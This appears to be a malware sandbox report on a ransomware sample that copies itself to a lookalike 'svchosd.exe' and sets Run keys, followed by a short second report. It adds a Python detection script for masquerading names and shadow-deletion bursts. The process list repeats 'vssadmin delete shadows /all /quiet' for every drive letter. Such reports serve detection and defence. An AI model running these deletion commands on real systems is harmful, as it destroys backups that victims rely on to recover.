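Beyond the shadow-copy deletion itself, the behavioral11 signatures show two patterns worth a targeted rule. The sample copies itself to C:\ProgramData\svchosd.exe, one character off svchost.exe and outside System32, registers it under Run as "Windows Firewall" (with select.bat as "Windows Update"), and then walks every drive letter from A: to Y: with a separate cmd.exe /c vssadmin.exe delete shadows /For=X: pair, 25 launches per launcher, which the persisted copy then repeats. The Python below is an added example written for this report, not sandbox output. It scores an image name against a short list of Windows binaries by edit distance and expected location, and it groups vssadmin deletions by the process that launched the cmd.exe wrapper so the per-drive loop shows up as one burst rather than 25 isolated events. The cmd.exe/vssadmin.exe PID pairs come from the report's WriteProcessMemory table; mapping them to drive letters in the order of the process list, the PID of svchosd.exe and the parent of dma locker 4.0.exe are assumptions.

```python
import ntpath
import re
from collections import defaultdict

# Events modelled on behavioral11. The (cmd.exe, vssadmin.exe) PID pairs are
# the report's, from the WriteProcessMemory table; their mapping to drive
# letters follows the order of the process list and is an assumption. The
# PID of svchosd.exe and the parent of the sample are made up (constructed).
SAMPLE_EVENTS = [
    {"pid": 1892, "ppid": 1300, "image": r"C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe"'},
    {"pid": 2600, "ppid": 1892, "image": r"C:\ProgramData\svchosd.exe",
     "cmdline": r'"C:\ProgramData\svchosd.exe"'},
]
CHAIN = [(892, 2204, "A"), (1820, 2676, "B"), (2716, 2856, "C"), (2444, 2496, "D"),
         (2924, 2172, "E"), (1916, 608, "F"), (1236, 2036, "G"), (2744, 2788, "H"),
         (1716, 1020, "I")]
for cmd_pid, vss_pid, letter in CHAIN:
    vss_cmd = rf"C:\WINDOWS\system32\vssadmin.exe delete shadows /For={letter}: /all /quiet"
    SAMPLE_EVENTS.append({"pid": cmd_pid, "ppid": 1892, "image": r"C:\Windows\system32\cmd.exe",
                          "cmdline": r"C:\Windows\system32\cmd.exe /c " + vss_cmd})
    SAMPLE_EVENTS.append({"pid": vss_pid, "ppid": cmd_pid,
                          "image": r"C:\WINDOWS\system32\vssadmin.exe", "cmdline": vss_cmd})

# Windows binaries commonly imitated, with the directories the real ones live in.
SYSTEM_BINARIES = {
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "lsass.exe": {r"c:\windows\system32"},
    "csrss.exe": {r"c:\windows\system32"},
    "explorer.exe": {r"c:\windows"},
}
VSS_FOR_RE = re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b.*?/for=([a-z]:)", re.I)


def edit_distance(a, b):
    """Levenshtein distance between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike(image_path):
    """Return the system binary an image name imitates, or None.

    A genuine name in its genuine directory passes; the same name elsewhere,
    or a name one edit away (svchosd.exe, scvhost.exe, lsas.exe), is flagged.
    """
    name = ntpath.basename(image_path).lower()
    directory = ntpath.dirname(image_path).lower()
    if name in SYSTEM_BINARIES and directory in SYSTEM_BINARIES[name]:
        return None
    for real in SYSTEM_BINARIES:
        if edit_distance(name, real) <= 1:
            return real
    return None


def shadow_delete_bursts(events, threshold=3):
    """Group per-volume shadow deletions by the process that launched them.

    Each `cmd.exe /c vssadmin.exe delete shadows /For=X:` pair is credited to
    the parent of the cmd.exe wrapper, so a loop over drive letters appears as
    one launcher with many volumes. Returns {launcher_pid: [volumes]} for
    launchers at or above `threshold` distinct volumes.
    """
    by_pid = {e["pid"]: e for e in events}
    per_launcher = defaultdict(set)
    for e in events:
        m = VSS_FOR_RE.search(e["cmdline"])
        if not m:
            continue
        launcher = e["ppid"]
        parent = by_pid.get(e["ppid"])
        if parent and ntpath.basename(parent["image"]).lower() == "cmd.exe":
            launcher = parent["ppid"]          # look through the cmd /c wrapper
        per_launcher[launcher].add(m.group(1).upper())
    return {pid: sorted(v) for pid, v in per_launcher.items() if len(v) >= threshold}


def analyze(events):
    """Return the masquerading images and per-volume deletion bursts in a batch."""
    masquerades = []
    for e in events:
        real = lookalike(e["image"])
        if real:
            masquerades.append((e["pid"], e["image"], real))
    return {"masquerades": masquerades, "bursts": shadow_delete_bursts(events)}


if __name__ == "__main__":
    print(analyze(SAMPLE_EVENTS))
```

The burst threshold of three distinct volumes is low on purpose: a legitimate administrator clearing shadows on one volume never produces a per-letter sweep, and the same grouping catches the second sweep that svchosd.exe launches once it is running under the Run key.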

Processes

C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe

"C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=A: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=A: /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=B: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=B: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=C: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=C: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=D: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=D: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=E: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=E: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=F: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=F: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=G: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=G: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=H: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=H: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=I: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=I: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=J: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=J: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=K: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=K: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=L: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=L: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=M: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=M: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=N: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=N: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=O: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=O: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=P: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=P: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=Q: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=Q: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=R: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=R: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=S: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=S: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=T: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=T: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=U: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=U: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=V: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=V: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=W: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=W: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=X: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=X: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=Y: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=Y: /all /quiet

C:\ProgramData\svchosd.exe

"C:\ProgramData\svchosd.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=A: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=A: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=B: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=B: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=C: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=C: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=D: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=D: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=E: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=E: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=F: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=F: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=G: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=G: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=H: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=H: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=I: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=I: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=J: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=J: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=K: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=K: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=L: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=L: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=M: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=M: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=N: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=N: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=O: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=O: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=P: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=P: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=Q: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=Q: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=R: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=R: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=S: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=S: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=T: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=T: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=U: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=U: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=V: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=V: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=W: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=W: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=X: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=X: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=Y: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=Y: /all /quiet

Network

Country Destination Domain Proto
US 5.8.63.54:80 tcp

Files

memory/1892-0-0x0000000000350000-0x0000000000391000-memory.dmp

memory/1892-1-0x0000000000400000-0x0000000000453000-memory.dmp

memory/1892-2-0x0000000000350000-0x0000000000391000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:10

Platform

win7-20240903-en

Max time kernel

567s

Max time network

568s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dump.mem.exe"

Signatures

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Local\\service.exe" C:\Users\Admin\AppData\Local\Temp\dump.mem.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\dump.mem.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\dump.mem.exe

"C:\Users\Admin\AppData\Local\Temp\dump.mem.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 exodus99.ru udp

Files

N/A